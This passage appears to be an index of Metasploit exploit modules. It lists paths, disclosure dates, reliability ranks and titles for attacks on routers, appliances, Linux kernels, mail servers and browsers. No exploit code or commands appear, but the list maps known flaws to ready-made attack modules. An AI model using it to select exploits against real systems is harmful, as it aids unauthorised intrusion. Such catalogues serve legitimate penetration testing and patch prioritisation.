MobileMail LibTIFF Buffer Overflow - apple_ios/ssh/cydia_default_ssh 2007-07-02 excellent No Apple iOS Default SSH Password Vulnerability - bsd/finger/morris_fingerd_bof 1988-11-02 normal Yes Morris Worm fingerd Stack Buffer Overflow - bsdi/softcart/mercantec_softcart 2004-08-19 great No Mercantec SoftCart CGI Overflow - dialup/multi/login/manyargs 2001-12-12 good No System V Derived /bin/login Extraneous Arguments Buffer Overflow - firefox/local/exec_shellcode 2014-03-10 excellent No Firefox Exec Shellcode from Privileged Javascript Shell - freebsd/ftp/proftp_telnet_iac 2010-11-01 great Yes ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD) - freebsd/http/watchguard_cmd_exec 2015-06-29 excellent Yes Watchguard XCS Remote Command Execution - freebsd/local/mmap 2013-06-18 great Yes FreeBSD 9 Address Space Manipulation Privilege Escalation - freebsd/local/watchguard_fix_corrupt_mail 2015-06-29 manual Yes Watchguard XCS FixCorruptMail Local Privilege Escalation - freebsd/misc/citrix_netscaler_soap_bof 2014-09-22 normal Yes Citrix NetScaler SOAP Handler Remote Code Execution - freebsd/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (*BSD x86) - freebsd/tacacs/xtacacsd_report 2008-01-08 average No XTACACSD report() Buffer Overflow - freebsd/telnet/telnet_encrypt_keyid 2011-12-23 great No FreeBSD Telnet Service Encryption Key ID Buffer Overflow - hpux/lpd/cleanup_exec 2002-08-28 excellent No HP-UX LPD Command Execution - irix/lpd/tagprinter_exec 2001-09-01 excellent Yes Irix LPD tagprinter Command Execution - linux/antivirus/escan_password_exec 2014-04-04 excellent Yes eScan Web Management Console Command Injection - linux/browser/adobe_flashplayer_aslaunch 2008-12-17 good No Adobe Flash Player ActionScript Launch Command Execution Vulnerability - linux/ftp/proftp_sreplace 2006-11-26 great Yes ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux) - linux/ftp/proftp_telnet_iac 2010-11-01 great Yes ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux) - linux/games/ut2004_secure 2004-06-18 good Yes Unreal Tournament 2004 "secure" Overflow (Linux) - linux/http/accellion_fta_getstatus_oauth 2015-07-10 excellent Yes Accellion FTA getStatus verify_oauth_token Command Execution - linux/http/advantech_switch_bash_env_exec 2015-12-01 excellent Yes Advantech Switch Bash Environment Variable Code Injection (Shellshock) - linux/http/airties_login_cgi_bof 2015-03-31 normal Yes Airties login-cgi Buffer Overflow - linux/http/alcatel_omnipcx_mastercgi_exec 2007-09-09 manual No Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution - linux/http/alienvault_exec 2017-01-31 excellent Yes AlienVault OSSIM/USM Remote Code Execution - linux/http/alienvault_sqli_exec 2014-04-24 excellent Yes AlienVault OSSIM SQL Injection and Remote Code Execution - linux/http/apache_continuum_cmd_exec 2016-04-06 excellent Yes Apache Continuum Arbitrary Command Execution - linux/http/apache_couchdb_cmd_exec 2016-04-06 excellent Yes Apache CouchDB Arbitrary Command Execution - linux/http/astium_sqli_upload 2013-09-17 manual Yes Astium Remote Code Execution - linux/http/asuswrt_lan_rce 2018-01-22 excellent No AsusWRT LAN Unauthenticated Remote Code Execution - linux/http/atutor_filemanager_traversal 2016-03-01 excellent Yes ATutor 2.2.1 Directory Traversal / Remote Code Execution - linux/http/axis_srv_parhand_rce 2018-06-18 excellent Yes Axis Network Camera .srv to parhand RCE - linux/http/belkin_login_bof 2014-05-09 normal Yes Belkin Play N750 login.cgi Buffer Overflow - linux/http/centreon_sqli_exec 2014-10-15 excellent Yes Centreon SQL and Command Injection - linux/http/centreon_useralias_exec 2016-02-26 excellent Yes Centreon Web Useralias Command Execution - linux/http/cfme_manageiq_evm_upload_exec 2013-09-04 excellent Yes Red Hat CloudForms Management Engine 5.1 agent/linuxpkgs Path Traversal - linux/http/cisco_firepower_useradd 2016-10-10 excellent Yes Cisco Firepower Management Console 6.0 Post Authentication UserAdd Vulnerability - linux/http/cisco_prime_inf_rce 2018-10-04 excellent Yes Cisco Prime Infrastructure Unauthenticated Remote Code Execution - linux/http/crypttech_cryptolog_login_exec 2017-05-03 excellent Yes Crypttech CryptoLog Remote Code Execution - linux/http/dcos_marathon 2017-03-03 excellent Yes DC/OS Marathon UI Docker Exploit - linux/http/ddwrt_cgibin_exec 2009-07-20 excellent No DD-WRT HTTP Daemon Arbitrary Command Execution - linux/http/denyall_waf_exec 2017-09-19 excellent Yes DenyAll Web Application Firewall Remote Code Execution - linux/http/dlink_authentication_cgi_bof 2013-02-08 normal Yes D-Link authentication.cgi Buffer Overflow - linux/http/dlink_command_php_exec_noauth 2013-02-04 excellent No D-Link Devices Unauthenticated Remote Command Execution - linux/http/dlink_dcs931l_upload 2015-02-23 great Yes D-Link DCS-931L File Upload - linux/http/dlink_dcs_930l_authenticated_remote_command_execution 2015-12-20 excellent No D-Link DCS-930L Authenticated Remote Command Execution - linux/http/dlink_diagnostic_exec_noauth 2013-03-05 excellent No D-Link DIR-645 / DIR-815 diagnostic.php Command Execution - linux/http/dlink_dir300_exec_telnet 2013-04-22 excellent No D-Link Devices Unauthenticated Remote Command Execution - linux/http/dlink_dir605l_captcha_bof 2012-10-08 manual Yes D-Link DIR-605L Captcha Handling Buffer Overflow - linux/http/dlink_dir615_up_exec 2013-02-07 excellent No D-Link DIR615h OS Command Injection - linux/http/dlink_dir850l_unauth_exec 2017-08-09 excellent Yes DIR-850L (Un)authenticated OS Command Exec - linux/http/dlink_dsl2750b_exec_noauth 2016-02-05 great Yes D-Link DSL-2750B OS Command Injection - linux/http/dlink_dspw110_cookie_noauth_exec 2015-06-12 normal Yes D-Link Cookie Command Execution - linux/http/dlink_dspw215_info_cgi_bof 2014-05-22 normal Yes D-Link info.cgi POST Request Buffer Overflow - linux/http/dlink_hedwig_cgi_bof 2013-02-08 normal Yes D-Link hedwig.cgi Buffer Overflow in Cookie Header - linux/http/dlink_hnap_bof 2014-05-15 normal Yes D-Link HNAP Request Remote Buffer Overflow - linux/http/dlink_hnap_header_exec_noauth 2015-02-13 normal Yes D-Link Devices HNAP SOAPAction-Header Command Execution - linux/http/dlink_hnap_login_bof 2016-11-07 excellent Yes Dlink DIR Routers Unauthenticated HNAP Login Stack Buffer Overflow - linux/http/dlink_upnp_exec_noauth 2013-07-05 normal Yes D-Link Devices UPnP SOAP Command Execution - linux/http/dnalims_admin_exec 2017-03-08 excellent Yes dnaLIMS Admin Module Command Execution - linux/http/docker_daemon_tcp 2017-07-25 excellent Yes Docker Daemon - Unprotected TCP Socket Exploit - linux/http/dolibarr_cmd_exec 2012-04-06 excellent Yes Dolibarr ERP/CRM Post-Auth OS Command Injection - linux/http/dreambox_openpli_shell 2013-02-08 great No OpenPLI Webif Arbitrary Command Execution - linux/http/efw_chpasswd_exec 2015-06-28 excellent No Endian Firewall Proxy Password Change Command Injection - linux/http/empire_skywalker 2016-10-15 excellent Yes PowerShellEmpire Arbitrary File Upload (Skywalker) - linux/http/esva_exec 2012-08-16 excellent Yes E-Mail Security Virtual Appliance learn-msg.cgi Command Injection - linux/http/f5_icall_cmd 2015-09-03 excellent Yes F5 iControl iCall::Script Root Command Execution - linux/http/f5_icontrol_exec 2013-09-17 excellent Yes F5 iControl Remote Root Command Execution - linux/http/foreman_openstack_satellite_code_exec 2013-06-06 excellent No Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection - linux/http/fritzbox_echo_exec 2014-02-11 excellent Yes Fritz!Box Webcm Unauthenticated Command Injection - linux/http/github_enterprise_secret 2017-03-15 excellent Yes Github Enterprise Default Session Secret And Deserialization Vulnerability - linux/http/gitlist_exec 2014-06-30 excellent Yes Gitlist Unauthenticated Remote Command Execution - linux/http/goahead_ldpreload 2017-12-18 excellent Yes GoAhead Web Server LD_PRELOAD Arbitrary Module Load - linux/http/goautodial_3_rce_command_injection 2015-04-21 excellent Yes GoAutoDial 3.3 Authentication Bypass / Command Injection - linux/http/gpsd_format_string 2005-05-25 average No Berlios GPSD Format String Vulnerability - linux/http/groundwork_monarch_cmd_exec 2013-03-08 excellent Yes GroundWork monarch_scan.cgi OS Command Injection - linux/http/hadoop_unauth_exec 2016-10-19 excellent Yes Hadoop YARN ResourceManager Unauthenticated Command Execution - linux/http/hp_system_management 2012-09-01 normal Yes HP System Management Anonymous Access Code Execution - linux/http/hp_van_sdn_cmd_inject 2018-06-25 excellent Yes HP VAN SDN Controller Root Command Injection - linux/http/huawei_hg532n_cmdinject 2017-04-15 excellent Yes Huawei HG532n Command Injection - linux/http/ibm_qradar_unauth_rce 2018-05-28 excellent Yes IBM QRadar SIEM Unauthenticated Remote Code Execution - linux/http/ipfire_bashbug_exec 2014-09-29 excellent Yes IPFire Bash Environment Variable Injection (Shellshock) - linux/http/ipfire_oinkcode_exec 2017-06-09 excellent Yes IPFire proxy.cgi RCE - linux/http/ipfire_proxy_exec 2016-05-04 excellent Yes IPFire proxy.cgi RCE - linux/http/kaltura_unserialize_cookie_rce 2017-09-12 excellent Yes Kaltura Remote PHP Code Execution over Cookie - linux/http/kaltura_unserialize_rce 2016-03-15 excellent Yes Kaltura Remote PHP Code Execution - linux/http/kloxo_sqli 2014-01-28 manual Yes Kloxo SQL Injection and Remote Code Execution - linux/http/lifesize_uvc_ping_rce 2014-03-21 excellent No LifeSize UVC Authenticated RCE via Ping - linux/http/linksys_apply_cgi 2005-09-13 great No Linksys WRT54 Access Point apply.cgi Buffer Overflow - linux/http/linksys_e1500_apply_exec 2013-02-05 excellent No Linksys E1500/E2500 apply.cgi Remote Command Injection - linux/http/linksys_themoon_exec 2014-02-13 excellent Yes Linksys E-Series TheMoon Remote Command Injection - linux/http/linksys_wrt110_cmd_exec 2013-07-12 excellent Yes Linksys Devices pingstr Remote Command Injection - linux/http/linksys_wrt160nv2_apply_exec 2013-02-11 excellent No Linksys WRT160nv2 apply.cgi Remote Command Injection - linux/http/linksys_wrt54gl_apply_exec 2013-01-18 manual No Linksys WRT54GL apply.cgi Command Execution - linux/http/linksys_wvbr0_user_agent_exec_noauth 2017-12-13 excellent Yes Linksys WVBR0-25 User-Agent Command Execution - linux/http/logsign_exec 2017-02-26 excellent Yes Logsign Remote Command Injection - linux/http/mailcleaner_exec 2018-12-19 excellent No Mailcleaner Remote Code Execution - linux/http/microfocus_secure_messaging_gateway 2018-06-19 excellent Yes MicroFocus Secure Messaging Gateway Remote Code Execution - linux/http/multi_ncc_ping_exec 2015-02-26 normal Yes D-Link/TRENDnet NCC Service Command Injection - linux/http/mutiny_frontend_upload 2013-05-15 excellent Yes Mutiny 5 Arbitrary File Upload - linux/http/mvpower_dvr_shell_exec 2015-08-23 excellent Yes MVPower DVR Shell Unauthenticated Command Execution - linux/http/nagios_xi_chained_rce 2016-03-06 excellent Yes Nagios XI Chained Remote Code Execution - linux/http/nagios_xi_chained_rce_2_electric_boogaloo 2018-04-17 manual Yes Nagios XI Chained Remote Code Execution - linux/http/netgear_dgn1000_setup_unauth_exec 2013-06-05 excellent Yes Netgear DGN1000 Setup.cgi Unauthenticated RCE - linux/http/netgear_dgn1000b_setup_exec 2013-02-06 excellent No Netgear DGN1000B setup.cgi Remote Command Execution - linux/http/netgear_dgn2200b_pppoe_exec 2013-02-15 manual No Netgear DGN2200B pppoe.cgi Remote Command Execution - linux/http/netgear_dnslookup_cmd_exec 2017-02-25 excellent Yes Netgear DGN2200 dnslookup.cgi Command Injection - linux/http/netgear_r7000_cgibin_exec 2016-12-06 excellent Yes Netgear R7000 and R6400 cgi-bin Command Injection - linux/http/netgear_readynas_exec 2013-07-12 manual Yes NETGEAR ReadyNAS Perl Code Evaluation - linux/http/netgear_unauth_exec 2016-02-25 excellent Yes Netgear Devices Unauthenticated Remote Command Execution - linux/http/netgear_wnr2000_rce 2016-12-20 excellent Yes NETGEAR WNR2000v5 (Un)authenticated hidden_lang_avi Stack Overflow - linux/http/nginx_chunked_size 2013-05-07 great Yes Nginx HTTP Server 1.3.9-1.4.0 Chunked Encoding Stack Buffer Overflow - linux/http/nuuo_nvrmini_auth_rce 2016-08-04 excellent No NUUO NVRmini 2 / Crystal / NETGEAR ReadyNAS Surveillance Authenticated Remote Code Execution - linux/http/nuuo_nvrmini_unauth_rce 2016-08-04 excellent Yes NUUO NVRmini 2 / NETGEAR ReadyNAS Surveillance Unauthenticated Remote Code Execution - linux/http/op5_config_exec 2016-04-08 excellent Yes op5 v7.1.9 Configuration Command Execution - linux/http/openfiler_networkcard_exec 2012-09-04 excellent Yes Openfiler v2.x NetworkCard Command Execution - linux/http/pandora_fms_exec 2014-01-29 excellent Yes Pandora FMS Remote Code Execution - linux/http/pandora_fms_sqli 2014-02-01 excellent Yes Pandora FMS Default Credential / SQLi Remote Code Execution - linux/http/panos_readsessionvars 2017-12-11 excellent No Palo Alto Networks readSessionVarsFromFile() Session Corruption - linux/http/peercast_url 2006-03-08 average No PeerCast URL Handling Buffer Overflow - linux/http/php_imap_open_rce 2018-10-23 good Yes php imap_open Remote Code Execution - linux/http/pineapp_ldapsyncnow_exec 2013-07-26 excellent Yes PineApp Mail-SeCure ldapsyncnow.php Arbitrary Command Execution - linux/http/pineapp_livelog_exec 2013-07-26 excellent Yes PineApp Mail-SeCure livelog.html Arbitrary Command Execution - linux/http/pineapp_test_li_conn_exec 2013-07-26 excellent Yes PineApp Mail-SeCure test_li_connection.php Arbitrary Command Execution - linux/http/pineapple_bypass_cmdinject 2015-08-01 excellent Yes Hak5 WiFi Pineapple Preconfiguration Command Injection - linux/http/pineapple_preconfig_cmdinject 2015-08-01 excellent Yes Hak5 WiFi Pineapple Preconfiguration Command Injection - linux/http/piranha_passwd_exec 2000-04-04 excellent No RedHat Piranha Virtual Server Package passwd.php3 Arbitrary Command Execution - linux/http/qnap_qcenter_change_passwd_exec 2018-07-11 excellent Yes QNAP Q'Center change_passwd Command Execution - linux/http/raidsonic_nas_ib5220_exec_noauth 2013-02-04 manual No Raidsonic NAS Devices Unauthenticated Remote Command Execution - linux/http/railo_cfml_rfi 2014-08-26 excellent Yes Railo Remote File Include - linux/http/rancher_server 2017-07-27 excellent Yes Rancher Server - Docker Exploit - linux/http/realtek_miniigd_upnp_exec_noauth 2015-04-24 normal Yes Realtek SDK Miniigd UPnP SOAP Command Execution - linux/http/riverbed_netprofiler_netexpress_exec 2016-06-27 excellent Yes Riverbed SteelCentral NetProfiler/NetExpress Remote Code Execution - linux/http/samsung_srv_1670d_upload_exec 2017-03-14 good Yes Samsung SRN-1670D Web Viewer Version 1.0.0.193 Arbitrary File Read and Upload - linux/http/seagate_nas_php_exec_noauth 2015-03-01 normal Yes Seagate Business NAS Unauthenticated Remote Command Execution - linux/http/smt_ipmi_close_window_bof 2013-11-06 good Yes Supermicro Onboard IPMI close_window.cgi Buffer Overflow - linux/http/sophos_wpa_iface_exec 2014-04-08 excellent No Sophos Web Protection Appliance Interface Authenticated Arbitrary Command Execution - linux/http/sophos_wpa_sblistpack_exec 2013-09-06 excellent Yes Sophos Web Protection Appliance sblistpack Arbitrary Command Execution - linux/http/spark_unauth_rce 2017-12-12 excellent Yes Apache Spark Unauthenticated Command Execution - linux/http/supervisor_xmlrpc_exec 2017-07-19 excellent Yes Supervisor XML-RPC Authenticated Remote Code Execution - linux/http/symantec_messaging_gateway_exec 2017-04-26 excellent No Symantec Messaging Gateway Remote Code Execution - linux/http/symantec_web_gateway_exec 2012-05-17 excellent Yes Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection - linux/http/symantec_web_gateway_file_upload 2012-05-17 excellent Yes Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability - linux/http/symantec_web_gateway_lfi 2012-05-17 excellent Yes Symantec Web Gateway 5.0.2.8 relfile File Inclusion Vulnerability - linux/http/symantec_web_gateway_pbcontrol 2012-07-23 excellent Yes Symantec Web Gateway 5.0.2.18 pbcontrol.php Command Injection - linux/http/symantec_web_gateway_restore 2014-12-16 excellent Yes Symantec Web Gateway 5 restore.php Post Authentication Command Injection - linux/http/synology_dsm_sliceupload_exec_noauth 2013-10-31 excellent Yes Synology DiskStation Manager SLICEUPLOAD Remote Command Execution - linux/http/tiki_calendar_exec 2016-06-06 excellent Yes Tiki-Wiki CMS Calendar Command Execution - linux/http/tp_link_sc2020n_authenticated_telnet_injection 2015-12-20 excellent No TP-Link SC2020n Authenticated Telnet Injection - linux/http/tr064_ntpserver_cmdinject 2016-11-07 normal Yes Zyxel/Eir D1000 DSL Modem NewNTPServer Command Injection Over TR-064 - linux/http/trend_micro_imsva_exec 2017-01-15 excellent No Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution - linux/http/trendmicro_imsva_widget_exec 2017-10-07 excellent Yes Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution - linux/http/trendmicro_sps_exec 2016-08-08 excellent Yes Trend Micro Smart Protection Server Exec Remote Code Injection - linux/http/trueonline_billion_5200w_rce 2016-12-26 excellent No TrueOnline / Billion 5200W-T Router Unauthenticated Command Injection - linux/http/trueonline_p660hn_v1_rce 2016-12-26 excellent Yes TrueOnline / ZyXEL P660HN-T v1 Router Unauthenticated Command Injection - linux/http/trueonline_p660hn_v2_rce 2016-12-26 excellent Yes TrueOnline / ZyXEL P660HN-T v2 Router Authenticated Command Injection - linux/http/ueb_api_rce 2017-08-08 excellent Yes Unitrends UEB http api remote code execution - linux/http/vap2500_tools_command_exec 2014-11-25 normal Yes Arris VAP2500 tools_command.php Command Execution - linux/http/vcms_upload 2011-11-27 excellent Yes V-CMS PHP File Upload and Execute - linux/http/wanem_exec 2012-08-12 excellent Yes WAN Emulator v2.3 Command Execution - linux/http/wd_mycloud_multiupload_upload 2017-07-29 excellent Yes Western Digital MyCloud multi_uploadify File Upload Vulnerability - linux/http/webcalendar_settings_exec 2012-04-23 excellent Yes WebCalendar 1.2.4 Pre-Auth Remote Code Injection - linux/http/webid_converter 2011-07-05 excellent Yes WeBid converter.php Remote PHP Code Injection - linux/http/wipg1000_cmd_injection 2017-04-20 excellent Yes WePresent WiPG-1000 Command Injection - linux/http/xplico_exec 2017-10-29 excellent Yes Xplico Remote Code Execution - linux/http/zabbix_sqli 2013-09-23 excellent Yes Zabbix 2.0.8 SQL Injection and Remote Code Execution - linux/http/zen_load_balancer_exec 2012-09-14 excellent Yes ZEN Load Balancer Filelog Command Execution - linux/http/zenoss_showdaemonxmlconfig_exec 2012-07-30 good Yes Zenoss 3 showDaemonXMLConfig Command Execution - linux/ids/alienvault_centerd_soap_exec 2014-05-05 excellent Yes AlienVault OSSIM av-centerd Command Injection - linux/ids/snortbopre 2005-10-18 good No Snort Back Orifice Pre-Preprocessor Buffer Overflow - linux/imap/imap_uw_lsub 2000-04-16 good Yes UoW IMAP Server LSUB Buffer Overflow - linux/local/abrt_raceabrt_priv_esc 2015-04-14 excellent Yes ABRT raceabrt Privilege Escalation - linux/local/af_packet_chocobo_root_priv_esc 2016-08-12 good Yes AF_PACKET chocobo_root Privilege Escalation - linux/local/af_packet_packet_set_ring_priv_esc 2017-03-29 good Yes AF_PACKET packet_set_ring Privilege Escalation - linux/local/apport_abrt_chroot_priv_esc 2015-03-31 excellent Yes Apport / ABRT chroot Privilege Escalation - linux/local/asan_suid_executable_priv_esc 2016-02-17 excellent Yes AddressSanitizer (ASan) SUID Executable Privilege Escalation - linux/local/autostart_persistence 2006-02-13 excellent No Autostart Desktop Item Persistence - linux/local/blueman_set_dhcp_handler_dbus_priv_esc 2015-12-18 excellent Yes blueman set_dhcp_handler D-Bus Privilege Escalation - linux/local/bpf_priv_esc 2016-05-04 good Yes Linux BPF doubleput UAF Privilege Escalation - linux/local/bpf_sign_extension_priv_esc 2017-11-12 great Yes Linux BPF Sign Extension Local Privilege Escalation - linux/local/cron_persistence 1979-07-01 excellent No Cron Persistence - linux/local/desktop_privilege_escalation 2014-08-07 excellent Yes Desktop Linux Password Stealer and Privilege Escalation - linux/local/docker_daemon_privilege_escalation 2016-06-28 excellent Yes Docker Daemon Privilege Escalation - linux/local/glibc_ld_audit_dso_load_priv_esc 2010-10-18 excellent Yes glibc LD_AUDIT Arbitrary DSO Load Privilege Escalation - linux/local/glibc_origin_expansion_priv_esc 2010-10-18 excellent Yes glibc '$ORIGIN' Expansion Privilege Escalation - linux/local/glibc_realpath_priv_esc 2018-01-16 normal Yes glibc 'realpath()' Privilege Escalation - linux/local/hp_smhstart 2013-03-30 normal No HP System Management Homepage Local Privilege Escalation - linux/local/juju_run_agent_priv_esc 2017-04-13 excellent Yes Juju-run Agent Privilege Escalation - linux/local/kloxo_lxsuexec 2012-09-18 excellent No Kloxo Local Privilege Escalation - linux/local/lastore_daemon_dbus_priv_esc 2016-02-02 excellent Yes lastore-daemon D-Bus Privilege Escalation - linux/local/libuser_roothelper_priv_esc 2015-07-24 great Yes Libuser roothelper Privilege Escalation - linux/local/nested_namespace_idmap_limit_priv_esc 2018-11-15 great Yes Linux Nested User Namespace idmap Limit Local Privilege Escalation - linux/local/netfilter_priv_esc_ipv4 2016-06-03 good Yes Linux Kernel 4.6.3 Netfilter Privilege Escalation - linux/local/network_manager_vpnc_username_priv_esc 2018-07-26 excellent Yes Network Manager VPNC Username Privilege Escalation - linux/local/ntfs3g_priv_esc 2017-01-05 good Yes Debian/Ubuntu ntfs-3g Local Privilege Escalation - linux/local/overlayfs_priv_esc 2015-06-16 good Yes Overlayfs Privilege Escalation - linux/local/pkexec 2011-04-01 great Yes Linux PolicyKit Race Condition Privilege Escalation - linux/local/rc_local_persistence 1980-10-01 excellent No rc.local Persistence - linux/local/rds_priv_esc 2010-10-20 great Yes Reliable Datagram Sockets (RDS) Privilege Escalation - linux/local/recvmmsg_priv_esc 2014-02-02 good Yes Linux Kernel recvmmsg Privilege Escalation - linux/local/service_persistence 1983-01-01 excellent No Service Persistence - linux/local/sock_sendpage 2009-08-13 great Yes Linux Kernel Sendpage Local Privilege Escalation - linux/local/sophos_wpa_clear_keys 2013-09-06 excellent Yes Sophos Web Protection Appliance clear_keys.pl Local Privilege Escalation - linux/local/udev_netlink 2009-04-16 great No Linux udev Netlink Local Privilege Escalation - linux/local/ueb_bpserverd_privesc 2018-03-14 excellent No Unitrends Enterprise Backup bpserverd Privilege Escalation - linux/local/ufo_privilege_escalation 2017-08-10 good Yes Linux Kernel UDP Fragmentation Offset (UFO) Privilege Escalation - linux/local/vmware_alsa_config 2017-05-22 excellent Yes VMware Workstation ALSA Config File Local Privilege Escalation - linux/local/vmware_mount 2013-08-22 excellent Yes VMWare Setuid vmware-mount Unsafe popen(3) - linux/local/zpanel_zsudo 2013-06-07 excellent Yes ZPanel zsudo Local Privilege Escalation Exploit - linux/misc/accellion_fta_mpipe2 2011-02-07 excellent No Accellion FTA MPIPE2 Command Execution - linux/misc/asus_infosvr_auth_bypass_exec 2015-01-04 excellent No ASUS infosvr Auth Bypass Command Execution - linux/misc/drb_remote_codeexec 2011-03-23 excellent No Distributed Ruby Remote Code Execution - linux/misc/gld_postfix 2005-04-12 good No GLD (Greylisting Daemon) Postfix Buffer Overflow - linux/misc/hid_discoveryd_command_blink_on_unauth_rce 2016-03-28 excellent Yes HID discoveryd command_blink_on Unauthenticated RCE - linux/misc/hikvision_rtsp_bof 2014-11-19 normal No Hikvision DVR RTSP Request Remote Code Execution - linux/misc/hp_data_protector_cmd_exec 2011-02-07 excellent No HP Data Protector 6 EXEC_CMD Remote Code Execution - linux/misc/hp_jetdirect_path_traversal 2017-04-05 normal No HP Jetdirect Path Traversal Arbitrary Code Execution - linux/misc/hp_nnmi_pmd_bof 2014-09-09 normal Yes HP Network Node Manager I PMD Buffer Overflow - linux/misc/hp_vsa_login_bof 2013-06-28 normal Yes HP StorageWorks P4000 Virtual SAN Appliance Login Buffer Overflow - linux/misc/hplip_hpssd_exec 2007-10-04 excellent No HPLIP hpssd.py From Address Arbitrary Command Execution - linux/misc/ib_inet_connect 2007-10-03 good No Borland InterBase INET_connect() Buffer Overflow - linux/misc/ib_jrd8_create_database 2007-10-03 good No Borland InterBase jrd8_create_database() Buffer Overflow - linux/misc/ib_open_marker_file 2007-10-03 good No Borland InterBase open_marker_file() Buffer Overflow - linux/misc/ib_pwd_db_aliased 2007-10-03 good No Borland InterBase PWD_db_aliased() Buffer Overflow - linux/misc/jenkins_java_deserialize 2015-11-18 excellent Yes Jenkins CLI RMI Java Deserialization Vulnerability - linux/misc/jenkins_ldap_deserialize 2016-11-16 excellent Yes Jenkins CLI HTTP Java Deserialization Vulnerability - linux/misc/lprng_format_string 2000-09-25 normal No LPRng use_syslog Remote Format String Vulnerability - linux/misc/mongod_native_helper 2013-03-24 normal No MongoDB nativeHelper.apply Remote Code Execution - linux/misc/nagios_nrpe_arguments 2013-02-21 excellent Yes Nagios Remote Plugin Executor Arbitrary Command Execution - linux/misc/netcore_udp_53413_backdoor 2014-08-25 normal Yes Netcore Router Udp 53413 Backdoor - linux/misc/netsupport_manager_agent 2011-01-08 average No NetSupport Manager Agent Remote Buffer Overflow - linux/misc/novell_edirectory_ncp_bof 2012-12-12 normal Yes Novell eDirectory 8 Buffer Overflow - linux/misc/opennms_java_serialize 2015-11-06 normal No OpenNMS Java Object Unserialization Remote Code Execution - linux/misc/qnap_transcode_server 2017-08-06 excellent Yes QNAP Transcode Server Command Execution - linux/misc/quest_pmmasterd_bof 2017-04-09 normal Yes Quest Privilege Manager pmmasterd Buffer Overflow - linux/misc/sercomm_exec 2013-12-31 great Yes SerComm Device Remote Code Execution - linux/misc/ueb9_bpserverd 2017-08-08 excellent Yes Unitrends UEB bpserverd authentication bypass RCE - linux/misc/zabbix_server_exec 2009-09-10 excellent Yes Zabbix Server Arbitrary Command Execution - linux/mysql/mysql_yassl_getname 2010-01-25 good No MySQL yaSSL CertDecoder::GetName Buffer Overflow - linux/mysql/mysql_yassl_hello 2008-01-04 good No MySQL yaSSL SSL Hello Message Buffer Overflow - linux/pop3/cyrus_pop3d_popsubfolders 2006-05-21 normal No Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow - linux/postgres/postgres_payload 2007-06-05 excellent Yes PostgreSQL for Linux Payload Execution - linux/pptp/poptop_negative_read 2003-04-09 great Yes Poptop Negative Read Overflow - linux/proxy/squid_ntlm_authenticate 2004-06-08 great No Squid NTLM Authenticate Overflow - linux/samba/chain_reply 2010-06-16 good No Samba chain_reply Memory Corruption (Linux x86) - linux/samba/is_known_pipename 2017-03-24 excellent Yes Samba is_known_pipename() Arbitrary Module Load - linux/samba/lsa_transnames_heap 2007-05-14 good Yes Samba lsa_io_trans_names Heap Overflow - linux/samba/setinfopolicy_heap 2012-04-10 normal Yes Samba SetInformationPolicy AuditEventsInfo Heap Overflow - linux/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Linux x86) - linux/smtp/exim4_dovecot_exec 2013-05-03 excellent No Exim and Dovecot Insecure Configuration Command Injection - linux/smtp/exim_gethostbyname_bof 2015-01-27 great Yes Exim GHOST (glibc gethostbyname) Buffer Overflow - linux/smtp/haraka 2017-01-26 excellent Yes Haraka SMTP Command Injection - linux/ssh/ceragon_fibeair_known_privkey 2015-04-01 excellent No Ceragon FibeAir IP-10 SSH Private Key Exposure - linux/ssh/exagrid_known_privkey 2016-04-07 excellent No ExaGrid Known SSH Key and Default Password - linux/ssh/f5_bigip_known_privkey 2012-06-11 excellent No F5 BIG-IP SSH Private Key Exposure - linux/ssh/loadbalancerorg_enterprise_known_privkey 2014-03-17 excellent No Loadbalancer.org Enterprise VA SSH Private Key Exposure - linux/ssh/mercurial_ssh_exec 2017-04-18 excellent No Mercurial Custom hg-ssh Wrapper Remote Code Exec - linux/ssh/quantum_dxi_known_privkey 2014-03-17 excellent No Quantum DXi V1000 SSH Private Key Exposure - linux/ssh/quantum_vmpro_backdoor 2014-03-17 excellent No Quantum vmPRO Backdoor Command - linux/ssh/solarwinds_lem_exec 2017-03-17 excellent No SolarWind LEM Default SSH Password Remote Code Execution - linux/ssh/symantec_smg_ssh 2012-08-27 excellent No Symantec Messaging Gateway 9.5 Default SSH Password Vulnerability - linux/ssh/ubiquiti_airos_file_upload 2016-02-13 excellent No Ubiquiti airOS Arbitrary File Upload - linux/ssh/vmware_vdp_known_privkey 2016-12-20 excellent No VMware VDP Known SSH Key - linux/telnet/netgear_telnetenable 2009-10-30 excellent Yes NETGEAR TelnetEnable - linux/telnet/telnet_encrypt_keyid 2011-12-23 great No Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow - linux/upnp/dlink_upnp_msearch_exec 2013-02-01 excellent Yes D-Link Unauthenticated UPnP M-SEARCH Multicast Command Injection - linux/upnp/miniupnpd_soap_bof 2013-03-27 normal Yes MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution - mainframe/ftp/ftp_jcl_creds 2013-05-12 normal Yes FTP JCL Execution - multi/browser/adobe_flash_hacking_team_uaf 2015-07-06 great No Adobe Flash Player ByteArray Use After Free - multi/browser/adobe_flash_nellymoser_bof 2015-06-23 great No Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow - multi/browser/adobe_flash_net_connection_confusion 2015-03-12 great No Adobe Flash Player NetConnection Type Confusion - multi/browser/adobe_flash_opaque_background_uaf 2015-07-06 great No Adobe Flash opaqueBackground Use After Free - multi/browser/adobe_flash_pixel_bender_bof 2014-04-28 great No Adobe Flash Player Shader Buffer Overflow - multi/browser/adobe_flash_shader_drawing_fill 2015-05-12 great No Adobe Flash Player Drawing Fill Shader Memory Corruption - multi/browser/adobe_flash_shader_job_overflow 2015-05-12 great No Adobe Flash Player ShaderJob Buffer Overflow - multi/browser/adobe_flash_uncompress_zlib_uaf 2014-04-28 great No Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free - 